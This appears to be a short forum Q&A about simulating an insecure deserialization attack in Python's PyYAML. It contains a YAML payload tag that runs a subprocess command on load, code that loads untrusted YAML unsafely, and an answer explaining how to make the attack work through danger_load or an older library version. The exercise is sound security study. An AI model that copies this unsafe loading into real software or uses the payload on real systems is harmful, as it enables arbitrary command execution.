So I'm currently trying to simulate an Insecure Deserialization attack. Here's the code I'm using:
import yaml
with open('malicious.yml') as yaml_file:
contents = yaml.load(yaml_file)
print(contents['foo'])
The file malicious.yml contains the following:
foo: !!python/object/apply:subprocess.check_output ['ls']
However, when I run the script, I get the following error:
yaml.constructor.ConstructorError: could not determine a constructor for the tag 'tag:yaml.org,2002:python/object/apply:subprocess.check_output'
in "malicious.yml", line 1, column 6
I looked around a bit but still couldn't find why. Any help would be appreciated.
If you are trying to simulate an insecure deserialization attack, you should use
contents = yaml.danger_load(yaml_file)
or use an older version of PyYAML (pip install pyyaml<4). The API was changed with version 4.1 without any documentation changes.